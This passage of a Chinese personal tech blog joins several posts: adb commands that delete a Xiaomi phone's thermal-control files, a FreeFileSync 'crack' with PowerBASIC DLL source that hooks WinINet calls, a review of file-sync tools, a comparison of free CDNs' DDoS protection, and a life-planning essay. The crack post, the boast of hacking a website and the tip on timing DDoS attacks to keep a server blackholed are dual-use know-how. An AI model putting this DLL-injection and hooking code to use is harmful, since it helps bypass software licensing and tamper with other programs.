备份 adb shell mv /system/vendor/bin/thermal-engine /system/vendor/bin/thermal-engine.bak adb shell mv /system/vendor/etc/thermal-engine-8996-game.conf /system/vendor/etc/thermal-engine-8996-game.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996-high.conf /system/vendor/etc/thermal-engine-8996-high.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996-map.conf /system/vendor/etc/thermal-engine-8996-map.conf.bak adb shell mv /system/vendor/etc/thermal-engine-8996.conf /system/vendor/etc/thermal-engine-8996.conf.bak # 或者直接删除 adb shell rm -f /system/vendor/bin/thermal-engine adb shell rm -f /system/vendor/etc/thermal-engine-8996-game.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996-high.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996-map.conf adb shell rm -f /system/vendor/etc/thermal-engine-8996.conf   5、复制修改过的温控文件到系统 system 目录(文章末尾有下载):   注意!操作 system 目录需要 adb root 权限!(前边已开启) 1 adb push "C:\电脑本机路径\thermal-engine-8996.conf" /system/vendor/etc/thermal-engine-8996.conf   6、恢复 system 权限为 read only:   这一步为可选操作,因为重启后无需操作会自动恢复,当然,如果不打算重启机子的话,最好还是将它恢复到 read only 状态。 1 adb shell mount -o ro,remount -t auto /system   7、最后重启手机即可: 1 adb reboot   8、关闭手机的 USB 调试及开发者模式,避免安全隐患。(具体见上边)   至此操作完成!尽情享受多核火力全开带来的快感吧! 参考资料   以下两个帖子,温控文件只有大核心温度频率控制区别,“逆天少之龙”的是:1747000,“刚刚不”的是:1516000,其它完全一样。   核总(https://lcx.cc/)发现其实是“刚刚不”抄袭的“逆天少之龙”配置文件(互相有可能认识的),而且这两位也是一知半解,讲得十分混乱,新手可能看的一脸懵逼…… 小米82x机型温控完美解决,逆天少之龙 发表于 2018-8-17 19:17 小米5s改温控文件,刚刚不 发表于 2018-8-24 18:05   摘录原帖部分有用内容留存一下: [教程] 小米82x机型温控完美解决 http://www.miui.com/thread-17542989-1-1.html 逆天少之龙 2018-8-17 19:17 | 来自小米手机5s |复制| |跳转 看到标题,大家觉得可能又是温控拜拜,内核调校等等,不!今天我教大家怎么用re文件管理器完美解决火龙温控与锁核与温度问题! 首先需要解锁bl(没有解锁不用看下去了),然后获取完整root权限,记住是完整权限!然后给re文件管理器root权限,接着找到下图文件夹 然后,将下面链接文件复制在上面删除三个文件的文件夹里,然后关机重启就行,最后附上链接 链接:https://pan.baidu.com/s/1T8r93oV7oBqe6p_eLwL-TQ 密码:81vv(已失效) 亲测温度低了许多,永远不锁核,续航提升不少,下面附图 效果用事实说话 楼主| 2018-9-19 20:59 | 来自小米手机5s | 重新分享链接在这里链接:https://pan.baidu.com/s/1R0SfRBcDd5CtCrwSdQDRgw 密码:qr3o [教程] 小米5s改温控文件 http://www.miui.com/thread-17712899-1-1.html 刚刚不 2018-8-24 18:05 | 来自小米手机5s |复制| |跳转 首先手机要root ,下载re文件管理器,system解锁工具,下载好给root权限,打开system解锁(手机会重启), 打开re浏览器,在左边的根目录找到system文件夹点开,找到etc文件夹点开,找到thermal-engine-8996-high.conf thermal-engine-8996-map.conf thermal-engine-8996.conf这三个文件(都在一起的)把它删除, 然后把下载的温控文件复制过去到这个文件夹,然后回到根目录找到vendor点开找到thermal-engine把他删除。 然后手动重启,完事,四核全开温度不热。 链接:https://pan.baidu.com/s/1qtDSBK4kljjsCKV9H9uUlQ 密码:y1tl 温控文件 链接:https://pan.baidu.com/s/1Qsue8v3vKrC8GywMgR8YgA 密码:71vl re浏览器 链接:https://pan.baidu.com/s/1S_P4kDyCCq_MLPYV7Akv5g 密码:3ip9 system解锁 几种挂载方法   使用 mount 挂载 system 目录为读写权限。   1、获取 system 分区当前全名和权限 1 2 3 4 5 6 7 8 mount | grep 'system' # 或者 cat /proc/partitions # 说明 ro = read only(只读) rw = read write(读写)   2、重新挂载 system 为读写权限 1 2 3 4 5 6 7 8 9 # 参数“/dev/block/sde39”为第一步返回结果 # 注意!每个手机不一样!解锁前后也不一样!每次操作前都要查看!!! mount -o remount,rw /dev/block/sde39 /system # 如果提示:mount: '/system' not in /proc/mounts,使用底下命令(推荐): mount -o rw,remount -t auto /system # 或者(linux系统自己会去维护一个已经mount的表.所以只需要输入现有的挂载点就行啦) mount -o remount,rw /system   3、重新查看、验证 system 权限 1 mount | grep 'system'   4、恢复 system 权限为 read only(只读)(或者重启后无需操作会自动恢复,当然,如果不打算重启机子的话,最好还是将它恢复到 read only 状态) 1 2 3 4 5 6 7 8 9 # 参数“/dev/block/dm-0”为第一步返回结果 # 注意!每个手机不一样!解锁前后也不一样!每次操作前都要查看!!! mount -o remount,ro /dev/block/dm-0 /system # 如果提示:mount: '/system' not in /proc/mounts,使用底下命令(推荐): mount -o ro,remount -t auto /system # 或者(linux系统自己会去维护一个已经mount的表.所以只需要输入现有的挂载点就行啦) mount -o remount,ro /system 相关下载 thermal-engine-8996.conf (修改好的温控配置文件) 温控拜拜.apk system 分区一键解锁、上锁.apk 小米手机助手 360驱动大师 驱动精灵 Universal Adb Driver MIUI 官方的小米手机驱动 Platform-Tools (adb.exe): Darwin/macOS?、Linux、Windows

2019/1/30
articleCard.readMore

FreeFileSync 全版本破解补丁、绿色便携版

FreeFileSync (官网: https://freefilesync.org/) 是一款免费、开源的文件夹比较和同步软件,跨平台、多协议、双向文件夹对比同步工具,支持 Google Driver、SFTP(SSH)、FTP 等协议,十分好用,支持 Windows、Linux、Mac OS X,它也适用于64位操作系统。   程序安装默认可选择一个标准的安装程序或作为一个便携式应用程序。采用一个干净、简单、直观的界面,以同步为目标,提供了多种功能。   核总(https:/lcx.cc/)曾经在“全球几款免费的文件对比同步工具简单测评”一文中对该工具做过简单介绍。   核总用这个软件也有好几年了,官方虽然说有便携版功能(无需安装、即开即用),但是限定了只有捐赠版才有,你懂的,要银子~   注意!这是个免费开源软件!为了软件的持续发展,还是希望有钱的大佬购买捐赠版! 如果您发现FreeFileSync很有用,请考虑通过捐赠来支持该项目。 您的捐款将资助新功能的开发,并有助于保持持续的计划维护。这可确保FreeFileSync保持最新,并始终在不断变化的硬件和软件上提供最佳性能。 支持该项目:https://freefilesync.org/donate.php   然而像核总(https:/lcx.cc/)这种穷逼怎么可能买得起捐赠版……   So……   泽东同志说得好,自己动手、丰衣足食~   于是核总(https:/lcx.cc/)对软件研究了一番,主要想实现以下几个功能: 绿色便携版功能 禁止强制自动更新   (只有捐赠版才能选择是否自动更新,普通版无论选什么都是强制更新,很烦人) 便携版   首先便携版功能比较好实现,官方普通版直接随便安装到一个路径,然后把安装好的文件打包就可以了,也就是说官方程序默认支持不安装运行,也没有注册表依赖什么的,无需进行修改。 文件结构 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 # 以最新的 10.8 版本做例子 # 其他版本大同小异,没写到的文件是无用文件,例如 uninstall.exe 之类的 FreeFileSync v10.8 │ │ ding.wav # 提示音 │ gong.wav # 提示音 │ harp.wav # 提示音 │ Install.dat # 安装记录(仅卸载的时候清理文件用,没啥用) │ Resources.zip # 图标资源文件 │ LastRun.ffs_gui # 最近的同步任务记录(配置文件) │ HideConsole.vbs # 隐藏启动器 │ FreeFileSync.exe # 启动器,根据系统版本启动 Bin 目录中对应的主程序 │ RealTimeSync.exe # 启动器,启动后台实时同步任务进程(同上) │ GlobalSettings.xml # 全局设置(配置文件) │ ├─Bin # 存放真正主程序的文件夹,主程序根据系统类型分为各个版本 │ FreeFileSync_Win32.exe # Windows x86 主程序 │ FreeFileSync_x64.exe # Windows x64 主程序 │ FreeFileSync_XP.exe # Windows XP 主程序 │ RealTimeSync_Win32.exe # Windows x86 实时同步任务进程 │ RealTimeSync_x64.exe # Windows x64 实时同步任务进程 │ RealTimeSync_XP.exe # Windows XP 实时同步任务进程 │ Shadow_Server2003_Win32.dll # 依赖组件(界面效果相关) │ Shadow_Windows7_Win32.dll # 依赖组件(界面效果相关) │ Shadow_Windows7_x64.dll # 依赖组件(界面效果相关) │ Shadow_XP_Win32.dll # 依赖组件(界面效果相关) │ Taskbar7_Win32.dll # 依赖组件(界面效果相关) │ Taskbar7_x64.dll # 依赖组件(界面效果相关) │ ├─GoogleDrive # 谷歌云盘相关目录 ├─Languages # 语言文件(官方提供了几十种语言文件,只保留简体中文就够用了) │ chinese_simple.lng │ └─Logs # 一些执行日志文件,没啥用 禁用自动更新   对程序进行了简单的逆向破解分析后,发现主程序使用了自校验保护,直接修改主程序打补丁的话比较麻烦,于是采用了 dll 注入打内存补丁的方案,简单、粗暴、直接、高效! 更新原理   官方采用的自动更新方法很简单,直接 http 请求: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 http://www.freefilesync.org/get_latest_version_number.php POST /get_latest_version_number.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: FFS-Update-Check Host: freefilesync.org Content-Length: 125 Cache-Control: no-cache ffs_version=10.8&installation_type=Portable&ffs_variant=Free&os_name=Windows&os_version=6.1&os_arch=64&language=zh&country=CN HTTP/1.1 200 OK Date: Mon, 28 Jan 2019 06:17:54 GMT Server: Apache Content-Length: 4 Cache-Control: max-age=3600 Expires: Mon, 28 Jan 2019 07:17:54 GMT Vary: Accept-Encoding,User-Agent Content-Type: application/octet-stream 10.8   如果有新版本的话,则执行以下请求获取新版本更新说明(以 9.5 版本为例): 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 POST /get_latest_changes.php HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: FFS-Update-Check Host: www.freefilesync.org Content-Length: 9 Cache-Control: no-cache since=9.4 HTTP/1.1 200 OK Date: Sun, 12 Nov 2017 08:19:47 GMT Server: Apache Cache-Control: max-age=3600 Expires: Sun, 12 Nov 2017 09:19:47 GMT Vary: Accept-Encoding,User-Agent Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 2c0 FreeFileSync 9.5 [2017-11-05] ----------------------------- Allow to change error handling option on progress dialogs Set up shutdown behavior during sync (summary, exit, sleep) Conditional execution of the post sync command line Directly use native shutdown/sleep API Run post sync command even when fail on first error was set Merged batch and GUI error handling options Write post sync command to log file Update GUI-specific options when saving as batch job Progress graph area matches processed data ratio Delete files permanently with Shift+Del Apply correct quotation for CSV-exported folder list Use Unicode arrow chars with ASCII for variant description Updated libcurl, OpenSSL to latest builds 0   最后提示用户更新软件(官方更新频率很高,所以神烦)。   升级请求主要出现在以下文件中: 1 2 3 \Bin\FreeFileSync_Win32.exe \Bin\FreeFileSync_x64.exe \Bin\FreeFileSync_XP.exe 破解方案   所以屏蔽自动升级方案就很简单了,直接注入一个 dll 到主程序中,然后直接修改内存 API 函数调用地址,拦截 http 更新请求,也就是内存补丁。   观察了一下 HTTP 请求调用的函数,发现主要使用以下几个 API: 1 2 3 InternetOpenW InternetConnectW InternetReadFile   于是使用 PowerBASIC 简单的写了个 dll,核心源码如下: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 #compile dll "hook.dll" #dim all #include "Win32API.inc" #include "HookApi.inc" %SE_DEBUG_PRIVILEGE = &H14 declare function RtlAdjustPrivilege lib "ntdll.dll" alias "RtlAdjustPrivilege"(byval Privilege as long, byval enable as long, byval CurrentThread as long, WasEnabled as long) as long global ghInstance as dword global hThread as dword '线程id global nextHook as dword function libmain (byval hInstance as long, byval fwdReason as long, byval lpvReserved as long) as long select case fwdReason case %DLL_PROCESS_ATTACH ghInstance = hInstance RtlAdjustPrivilege(%SE_DEBUG_PRIVILEGE, 1, 0, 0) '提升进程权限 thread create LoadHook(0) to hThread '创建一个线程加载hook function = 1 'success! case %DLL_PROCESS_DETACH '---------- local lresult as long thread close hThread to lresult '销毁线程 UnHookAPI(nextHook) '卸载 hook '---------- function = 1 'success! case %DLL_THREAD_ATTACH function = 1 'success! case %DLL_THREAD_DETACH function = 1 'success! end select end function thread function LoadHook(byval n as long) as long ' HookAPI("USER32.dll", "MessageBoxA", codeptr(functionCallback), nextHook) HookAPI("WININET.dll", "InternetOpenW", codeptr(Callback_InternetOpenW), nextHook) ' HookAPI("WININET.dll", "InternetConnectW", codeptr(Callback_InternetConnectW), nextHook) ' HookAPI("WININET.dll", "InternetReadFile", codeptr(Callback_InternetReadFile), nextHook) end function function Callback_InternetOpenW(byref lpszAgent as wstringz, byval dwAccessType as dword, byref lpszProxy as wstringz, byref lpszProxyBypass as wstringz, byval dwFlags as dword) as dword ' msgbox "InternetOpenW" function = %false end function function Callback_InternetConnectW( _ byval hInternet as dword, byref lpszServerName as wstringz, byval nServerPort as word, _ byref lpszUserName as wstringz, byref lpszPassword as wstringz, _ byval dwService as dword, byval dwFlags as dword, optional byval dwContext as dword) as dword ' msgbox "InternetConnectW" function = %false end function function Callback_InternetReadFile(byval hFile as dword, byval lpBuffer as byte ptr, byval dwNumberOfBytesToRead as dword, byref lpdwNumberOfBytesRead as dword) as long ' msgbox "InternetReadFile" function = %false end function 使用方法   然后只需要在主程序启动时注入这个 dll 即可屏蔽所有更新请求。   虽然主程序有多个版本(见 bin 文件夹),但是 win32 版本是通用的,所以只需要启动着一个即可,使用核总很早以前写的 dll 注射器实现启动注入(可使用批处理实现一键启动): 1 inject.exe "\Bin\FreeFileSync_Win32.exe"   至此,完美屏蔽自动更新。 相关说明   以上破解思路、代码及程序是核总(https:/lcx.cc/)在 2017 年底记录、开发的,今天没事整理了一下发出来,相关程序见底下下载。   当时破解的版本是 9.5,但是破解补丁是通用的(只要官方没有很大的结构性更新),也就是说 FreeFileSync 9.x、10.x 及以后全版本通杀。 相关下载   FreeFileSync全版本屏蔽自动升级破解补丁.rar

2019/1/28
articleCard.readMore

全球几款免费的文件对比同步工具简单测评

相信很多人碰到过这样的场景:   某苦逼程序猿白天在公司努力干活,下班还需要把公司的文件资料带回家继续加班工作,第二天早上上班再拿来更新到公司电脑上。   如果工作文件很多,而且每次修改的文件较多的话,人工对比是一件很操蛋的事情,这时候就需要一些文件同步工具了,尤其是双向的文件同步工具。   像**核总**(https:/lcx.cc/)就是这样一个经常拿着U盘在各个电脑来来回回、跑来跑去的人,非常需要这种工具,这些年用过的**文件对比同步工具**也很多。   例如最早国产的DiffSync(文件夹同步专家),当时用了好几年,后来作者出了 v1.008 终结版后就不再更新了,官网也关闭了,并且功能不完善、不支持某些特殊需求,又转到了其他工具,陆陆续续也用了很多种,这里把几款用过的工具做个简单的对比。   备注:由于软件名长度太长,表格会撑变形,这里使用首字母缩写代替。 软件 FC FFS GS AS DS PS 文件权限(ACL) √ √ √ × × × 文件属性(DACL) √ √ √ √ √ × 目录权限(ACL) √ √ √ × × × 目录属性(DACL) √ √ √ ? × × 文件创建日期 √ √ √ √ √ × 文件修改日期 √ √ √ √ √ √ 文件访问日期 √ × × √ √ × 目录创建时间 √ √ √ √ × × 目录修改时间 √ √ √ × × × 目录访问时间 √ × × × × × Hash校验对比 √ √ √ × × × 支持双向同步 ! √ √ √ × √ FastCopy (FC)   官网:https://fastcopy.jp/   FastCopy 是一款 Windows 平台上最快的文件复制、删除软件,它支持 UNICODE 和超过 MAX_PATH (260 个字符)的文件路径名,由一家日本公司开发,同时支持简单的文件同步功能。 FreeFileSync (FFS)   官网:https://freefilesync.org/   FreeFileSync 是一个免费的、开源的文件夹比较和同步软件。支持Windows、Linux、Mac OS X,它也适用于64位操作系统。   程序安装默认可选择一个标准的安装程序或作为一个便携式应用程序。采用一个干净、简单、直观的界面,以同步为目标,提供了多种功能。   我个人感觉比较好用的一款~   如何免费实现官方的绿色便携版功能及屏蔽自动更新:   FreeFileSync 全版本破解补丁、绿色便携版 GoodSync (GS)   官网:https://www.goodsync.com/   使用 GoodSync 轻松备份和同步文件。我们简单安全的文件备份和同步软件将确保您的文件永不丢失。   Windows 和 Linux 服务器的数据备份和同步。易于使用的自动化和无人值守服务,具有多个目标选项。   文件同步工具 GoodSync 可以实现两台电脑或者电脑与U盘之间的数据和文件的同步转换。通过此工具,可以备份U盘中Pass2Go 中的数据或者其他文件到个人电脑的硬盘上。   GoodSync 是一种简单和可靠的文件备份和文件同步软件。它会自动分析、同步,并备份您的电子邮件、珍贵的家庭照片、联系人、MP3歌曲,财务文件和其他重要文件本地-之间的台式机,笔记本电脑,服务器,外部驱动器,以及Windows Mobile设备,以及通过FTP远程,网友的WebDAV等等。   跨平台并且支持多协议文件同步,功能很强大! Allway Sync (AS)   官网:https://allwaysync.com/   Allway Sync是一款Windows 文件同步软件。   它可以在几个文件夹之间进行文件同步,自动将更新的文件覆盖几个同步文件夹中的旧文件。   软件带有一个小型数据库,监视每次更新后的文件状态。如果一次同步之后,你删除了同步文件夹中某些文件,它在同步的时候将其它的几个文件夹的副本也删除,而不会将未删除的旧文件重复拷贝到更新的文件夹。 PathSync (PS)   官网:https://www.cockos.com/pathsync/   PathSync 是一款目录文件同步工具。   PathSync 是 Cockos 出品,Cockos 是 Justin Frankel (开发 Winamp 的那个家伙) 成立的公司,开发的产品也是和音频有关的。这个小工具估计是他们搂柴火打兔子随便搞出来的,但真是很好用。免费。   PathSync 是由Cockos的一个伟大的员工在04年开发的,本来是随便玩玩的,结果是无心插柳柳成荫,反而将Pathsync做成了一个体积小巧,功能强大的同步工具。从04年到现在,已经陆续推出了数个版本,最后一次更新是在2015/12/28。目前的功能已经趋于完美,所以很久没有新动向了,如果大家有什么特殊想法,请遵循GPL协议,自己修改源代码增加修改功能。 DiffSync (DS)   官网:www.diffsync.com(域名于2010年6月14日到期,现已变成垃圾广告网站)   DiffSync(文件夹同步专家),简称DiffSync。DiffSync是一个文件差异同步专家,他功能强大,可以根据文件的大小,创建时间,修改时间,访问时间,文件属性等,进行对比,根据对比结果,进行差异同步。特有的高性能算法,让文件对比,变得如此快速。超快的文件复制功能,让大量文件同 步,变的如此轻松。   作者放出“DiffSync v1.008 终结版”后就不再更新了,官网也随之关闭了,以下为最后版本的信息: 名称:DiffSync(文件夹同步专家) 版本:1.008 日期:2010-4-25 作者:徐怀移 邮箱:xudea@126.com QQ:185452635 官网:www.diffsync.com 说明:diffsync.com 域名于2010年6月14日到期,为了广大用户的安全,请升级到本版本,本版本,移除检查更新,移除广告,移除和 diffsync.com 的所有连接,本版本将会是 diffsync 的最后一个版本。   哈哈!官网很久以前被核总黑过……

2019/1/19
articleCard.readMore

国内各大免费 CDN 性能及 DDOS 防御对比

前言   国内有很多免费 CDN 申请及使用的教程,也有一些简单的速度对比教程,但是没有一篇关于免费流量多少及 DDOS 防御高低的完整对比文章。   数月前,由于有这个需求,所以将国内各大免费 CDN 的性能及 DDOS 防御进行了对比,具体看底下。   PS:由于国内特色政策,所以本站使用的国外 Cloudflare 免费加速及防御服务。 阿里云   首先是阿里云的虚拟主机以及 VPS 默认防御标准。   目前 ECS、SLB、WAF、VPC、EIP、NAT 等云产品的被攻击流量触发黑洞阈值根据不同地区从 500Mbps 到 5Gbps 不等,具体参考下表。 云虚拟主机 DDoS 防护黑洞阈值 地区 独享虚拟主机 华东 1(杭州) 5G 华北 1(青岛) 5G 华南 1(深圳) 2G 华北 2(北京) 2G 华东 2(上海) 2G 香港 500M 美国 500M 新加坡 500M 云盾 DDoS 基础防护黑洞阈值   此规则适用于阿里云 ECS、SLB、及 EIP 实例。 地区 1 核 2 核 4 核以上 SLB/EIP(含NAT网关公网IP) 华北 1 500 M 1 G 5 G 5 G 华北 2 500 M 1 G 2 G 2 G 华北 3 500 M 1 G 2 G 2 G 华东 1 500 M 1 G 5 G 5G 华东 2 500 M 1 G 2 G 2 G 华南 1 500 M 1 G 2 G 2 G 香港 500 M 500 M 500 M 500 M 美东 1 500 M 500 M 500 M 500 M 美西 1 500 M 1 G 2 G 2 G 孟买 500 M 1 G 1 G 1 G 悉尼 500 M 500 M 500 M 500 M 迪拜 500 M 500 M 500 M 500 M 东京 500 M 500 M 500 M 500 M 新加坡 500 M 500 M 500 M 500 M 吉隆坡 500 M 500 M 500 M 500 M 法兰克福 500 M 500 M 500 M 500 M 说明   1、DDOS 攻击流量超过防御峰值则自动进入黑洞。   2、默认的黑洞时长是2.5小时,黑洞期间不支持解封。   3、实际黑洞时长视攻击情况而定,从30分钟到24小时不等。 总结   注意阿里云的流量单位为 Mbps、5Gbps,也就是说实际上:   500Mbps = 500 / 8 = 62.5MB/s   5Gbps = 5 * 1024 / 8 = 640MB/s   防御力度一般,很容易超过 DDOS 峰值进入黑洞。   而且进入黑洞后最少断网几个小时,攻击者只需要每隔几小时攻击几分钟,你服务器就得黑洞一天,非常的坑!WTF! 360 网站卫士 优点   不限流量!!!(赞!国内唯一!)   永不回源!!!(赞!国内唯一!)   免费版支持 HTTPS!(赞!国内最早、唯一支持 HTTPS 的免费 CDN!)   全国共享总 600G/s 防御带宽!(峰值 30G 以上的 DDOS 攻击) 缺点   需要备案,需要审核。(国内所有 CDN 都需要)   因为永不回源,所以很多灰色网站在用,导致攻击非常多,以至于整个 CDN 网络非常不稳定!!!一天总有几个小时全国某些地区打不开…… 官方问答 360网站卫士每天加速有流量限制吗,如果超出了,回源会不会暴露网站真实IP? HYTHYT 产品答疑师 发表于 2017-12-4 10:05 有限制,回源会暴露真实IP 360fans_s5Sz57 限制多少G,本人网站一天大概120G左右,这是百度云加速那边加速的数据! HYTHYT 回复360fans_s5Sz57:加速是没有流量限制的,是对网站的缓存空间大小有限制,若超出不会把您的网站回源,只是新的缓存数据会覆盖您的旧缓存数据,因此不用担心流量超出会暴露真实IP的问题。 全国各地总 600G 带宽机房部署”是真的吗? 答:千真万确!!千真万确!!千真万确!!(重要的事情说三遍)360网站卫士采用协同防护的方式, 当你网站受到攻击时,通过部署在全国各地的高防节点,将攻击流量分散到各省的集群清洗中心,利用大型流量清洗设备实时过滤 DDoS 流量, 识别并放过真实的访客流量,从而达到保护你网站免受大流量攻击的作用。 问题2. 600GB流量防护是共享还是独享,足够那么多网站使用么? 答:600GB是共享最大值,大部分CDN服务商都不可能做到给每个网站独享大流量防护的本事,一般企业也无法承担起独享大流量防护的费用。 新闻中,大家看到的上百GB甚至是几个TB的流量并不是指 1秒 内就有如此大的流量攻击,DDoS流量并发是一个不断上升的过程。 360通过多年的安全技术积累,保证了在DDoS流量在上升过程中及时压制、锁死,通俗地讲就是“来一波,死一波”,让每秒的流量保持在涓涓细流的范围。 当然,如果真的有并发流量我们也不怕,目前世界记录的最大流量是 500GB/小时(该数据统计截止于2016年8月),这样说来,网站卫士的流量防护储备早已破世界纪录了呢! 问题4. 如果网站被攻击流量过大,可能是非常大,360网站卫士会回源处理吗? 答:当流量过大时,360网站卫士监测中心报警启动,我们会及时排查“出事”网站,如果该网站是正规内容,我们将坚守使命,继续为你防护,永不回源!!! 但是,如果你的网站是我们所禁止(之前未被发现)的违规网站,我们将做下线甚至是拉黑处理。 加速乐 免费套餐   HTTP端口:仅限80端口   超量措施:回源≥6小时(坑)   加速流量:3600GB/月   加速流量峰值:5GB/小时(120GB/天) DDOS 防御   DDOS 免费版防御峰值 2G/s(比较弱),超过回源(坑)。(来自客服) 流量计算规则   DDOS 攻击也是算在加速流量里的。(大坑)   超过防御的流量攻击根据拦截到的 IP 数量每个 IP 扣除 1GB 流量,超过回源。   超过防御的 CC 攻击部分采用每 10 个 IP 扣除 1GB 的方式进行流量扣除,超过回源。 缺点   节点单一,比较少。 百度云加速 免费套餐   节点数量:6-12   套餐流量:10G/天(去年是 50GB/天、1500GB/月) DDOS 防御   DDOS 免费版防御是 5G/S 峰值,超过回源。 优点   节点比较多,速度比较快。   支持泛解析!(*.lcx.cc) 上海云盾   免费版支持 Https!   云加速一个月赠送 50G 流量,超出 0.15 元每 G,没有 DDOS 防御。 腾讯云   首次开通后,腾讯云系统会自动送 6 个月每月 50G 的流量包(也就是只免费半年),并且支持 HTTPS 服务。不过现在免费活动好像没了,也没有用过,鹅厂免费服务比较小气,没有过多了解。 参考资料   阿里云,云虚拟主机 DDoS 防护黑洞阈值   阿里云,云盾 DDoS 基础防护黑洞阈值   加速乐,知道创宇云安全 CDN 服务,套餐详情   360 网站卫士,免费 CDN 云加速   百度云加速,套餐版本介绍   上海云盾 CDN 云加速   腾讯云免费 CDN

2018/9/15
articleCard.readMore

《人生七年》,是什么在决定命运?

前言   多年前,曾看过此篇文章(内容雷同),以及 BBC 每隔七年跟拍穷人与富人长达 49 年的纪录片:《人生七年》   多年后,再次看到此文,随着人生的成长、学识的增加、阅历的丰富,人生的见解也产生了一些变化,觉得有必要在这里记录下。 原文   以下为转载的原文:25岁前,一定要完成哪些人生规划? 序言   最近在朋友的安利下看了 BBC 一部非常优秀的纪录片《BBC 跟拍 49 年:穷人与富人的人生七年》,完全被震撼到了。   导演似乎想要证明:富人的孩子还将会是富人,穷人的孩子多半还将会是穷人。导演选择了 14 个不同阶层的孩子进行跟拍,每七年记录一次他们的生活,分别是他们 7 岁,14 岁,21 岁,28 岁,35 岁,42 岁,49 岁,一直到 2012 年他们 56 岁的生活。   这部 150 分钟的片子基本上证明了导演的初衷:社会阶层的鸿沟是很难逾越。   是这些穷人不努力么?是他们没有机会么?是他们基因不好么?   这些并不是根本原因。这些穷人孩子里不乏天赋绝佳、工作拼命、机会多多的人,但他们依然过得很不如意。归根结底是他们没有人帮他们正确的规划人生,在人生的分叉口上没有做出正确选择。   那么哪些规划是越早做就越好的呢? 1、人生路径规划   这是非常让人难过却又很现实的问题:这些孩子 7 岁时,富人家长已经告诉孩子 Andrew 和 John 要常看《金融报》和《观察家》了,让他们开始对社会和财富运行规律有所了解,他们也会告诉孩子未来他们会上私立中学,考上牛津剑桥,走入社会上层。一切都被预定好了。   贫民窟的孩子则基本都在为温饱、家庭暴力、校园暴力所困扰,这时候的他们和家长都完全没有规划人生的意识。   在这些孩子 5、6 岁的时候,富人家的 7 个孩子基本都上私立学校——读牛津、剑桥——成为律师、教授走入社会上层;底层社会的孩子后来大多做着普通的服务性工作——修理工、保安之类。而他们也常与失业、贫穷、酒精、毒品、肥胖相伴。如果没有社会福利,他们生存处境堪忧。   其实现实生活里也不乏寒门出贵子的故事,这些寒门子弟成为贵子的根本原因是他们选择成为成功的人。他们愿意规划人生,尽力跳出原来的圈子去同那些更加优秀的人交流、学习。   **人和人之间最本质的差别不是技能,而是认知。**这些成为贵子的寒门子弟首先都要对成功有所渴望,在树立目标的前提下制定自己的人生规划,他们对财富积累、被动收入、自我管理都有了一定的认识。当机会来的时候,他们就能一下抓住,即使抓不住,他们也会积极的创造、等待机会。   能够规划自己人生的穷人,只是现在没钱,但不代表将来也没钱。可是缺乏规划、目标意识的穷人。即便是给他一个机会,他也不会意识到这是个机会。   建议:   (1)青天不算高,人心第一高。青年人一定要对未来和自己有信心,这是基础。同时也要认识到,如果想要打破社会阶层壁垒,仅靠你一代人未必能够实现,要有足够耐心。   (2)胡适告诫儿子:做人要做第一等人。凡事要做到最好,读书要尽可能去最好的学校,工作要尽可能去好的平台。这不是贪求虚名,好的平台给你的眼界和资源、机会是完全不一样的。   (3)选择行业、职业,第一看这个职业是不是社会长期刚需,例如医生、飞行员,受外在因素影响较小且收入相对较高;第二看这个行业是否在快速发展,如果这个行业已经陷入迟滞,远离之。   (4)给自己设立一个比自己现在的能力高的多的目标,然后把这个目标分解,再去研究如何达到这个目标,去学习,去实践,拼尽一切努力实现之。 2、身体和欲望规划   一个人成功与否,知道该做什么还在其次,知道不该做什么更加重要。知乎上就有一个关注量超过十万的热门问题:年轻人千万别碰哪些东西?   这些答案看下来让人触目惊心,黄、赌、毒、邪教、传销……好多你以为只会出现在电视上的事情都很真实地发生在这个社会上。   归根结底,那些答案里讲的年轻人都是扛不住欲望的诱惑,对自己的身体又看得轻贱,最终染上了艾滋、毒瘾、赌瘾,或者陷入了对快钱的渴望,走上了不归之路。   另一件一定要做的事就是对身体、健康的管理,说白了就是运动控制体形、控制饮食。因为不运动的胖人跟常运动的瘦人的工作、生活状态真心不一样。   你连自己的体重都控制不了,谈何控制人生?这样说不是没有道理,《穷人与富人的人生七年》里的精英阶层 Andrew 和 Jone 在 56 岁时还保持着较好的体型;属于中产阶级的公务员 Peter 夫妇身材也较好;但是底层阶级的男主们和他们的妻子就基本都肥胖臃肿、秃顶严重,他们有好几个在年轻时都是非常帅气英俊的。   优秀的家庭背景不仅仅代表着更丰富的资源,重要的是会传递给孩子优良的生活和自我管理习惯。这些孩子在自我管理、抵抗诱惑的时候会更加有毅力,会更加自律自强。   年轻人一定要好好规划自己的健身和欲望管理计划,前者是为了让你更好的工作和享受生活,让你有更强的毅力和活力,后者是为了让你不至于因为一时的欲望,毁掉要用一辈子的身体。   建议:   (1)性、快钱、美食,谁都想要,可是你一定要想清楚自己是要一时的快感还是长期的成长。这样的纠结可能会伴随人一辈子,但是只要选错一次就是深渊。   (2)千万不要接近毒品、赌博、嫖娼的人,这些人在长期跟自己思想斗争的过程中坚定地认为自己是对的,如果你接近他们,就会有机会被拖下水。知乎上讲了一个女孩子为了挽救吸毒的男友,被拉下水吸毒,让人不胜唏嘘。   (3)放弃那些吃了会让你难受的食物,尽可能远离高油、高糖、刺激的食物。   (4)制定长期的健身计划,尽可能的花钱请私教,特别是如果你坚持不下来,就让私教督促你。胖子和瘦子,特别是身材好的人的人生体验真心不一样。 3、刻意学习与练习的规划   大家都知道学习和练习的重要性。但是绝大多数人都是非常泛泛且缺乏体系、没有重点的学习。这种学习好像在浇田时用大水漫灌,事倍功半。   很多人就是推崇这种空有“努力”的学习源于美国作家格莱德威尔曾经提出的一个非常知名的 1 